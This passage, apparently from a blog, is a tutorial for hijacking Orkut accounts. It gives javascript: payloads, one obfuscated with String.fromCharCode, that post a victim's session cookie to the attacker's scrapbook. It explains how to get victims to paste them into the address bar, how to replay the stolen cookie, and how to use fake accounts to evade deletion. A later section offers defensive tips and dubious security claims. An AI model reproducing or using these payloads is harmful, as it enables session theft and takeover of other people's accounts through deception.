Then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles yourreal account wont be compromised.Its your choice.
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....
Now here is the script Code:
HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
1) Go to YOUR ALBUM section.
2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg
3) There will be a eight digit value.
4) Now put that value in the above javascript.
5) Thats it.
Now your javascript will look like:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
Now
give this script to the victim , ask him to go to his scrap book and
paste this script in his address bar and press enter. now you ll get
his cookies in your scrapbook.
Now after getting a cookie...
1) Go to your home page
2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).
3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.
4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...
5) THATS IT!!
ANOTHER SCRIPT : (100%working)
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit()
Put ur eight digit number in the place of (53093255)
Google uses a 4 Level Orkut login which makes it difficult to hack using brute force attack.
First Level Security-SSL or 128 bit secured connection
Second Level Google account checks for cookie in the sytem of user
Third Level Google provides a redirection to the entered User information
Fourth Level Google doesn't use conventional php/aspx/asp coding so impossible to attack using input validation attack!!!
It
is not an easy task to break this security! But still some people
manages to get access to other accounts. The question concerned is How
they do it? Many of them just use simple tricks that befool users and
then they themself leak out their password. Here are some points you
need to take care of, to prevent your Orkut account being hacked!
Phishing Attack
is the most popular way of stealing other's password.By using fake
login pages. The users land on a page where they are asked for their
login information and they enter their username and password thinking
it to be a real page but actually it is other way round. It submits all
the details entered to the programmer or the coder.
Orkut New Features:
I have come across a page that looks like they are giving the user a
choice of selecting new features for orkut with your ID and password,
of course!! When user submit the page, there goes his ID and password
mailed to the coder.
to protect from phishing try the latest security software in brlliantcomputing
Community Links: Many
times you are provided with a link to a community in a scrap. Read the
link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. Clicking on this link will take you to a fake login page and there you loose up your password.
Java script:
You must have seen the circulating scraps that asks you to paste this
code in your address bar and see what happens! Well sometimes they also
leak out your information. Check the code and if you are unsure of what
to do, then I recommend not to use it.
Primary mail address:
If by some means a hacker came to know password of your Yahoo mail or
Gmail, which users normally keeps as their primary mail address in
their Orkut account, then hacker can hack Orkut account by simply using
USER ID and clicking on 'forget password'.This way Google
will send link to the already hacked primary email id to change the
password of the Orkut account. Hence the email hacker will change your
Orkut account's password. Hence your Orkut account hacked too.
So
a better thing would be to keep a very unknown or useless email id of
yours as primary email id so that if the hacker clicks on 'Forgot
password' the password changing link goes to an unknown email id i.e.
not known to the hacker.Hence your Orkut account saved.
No comments:
Post a Comment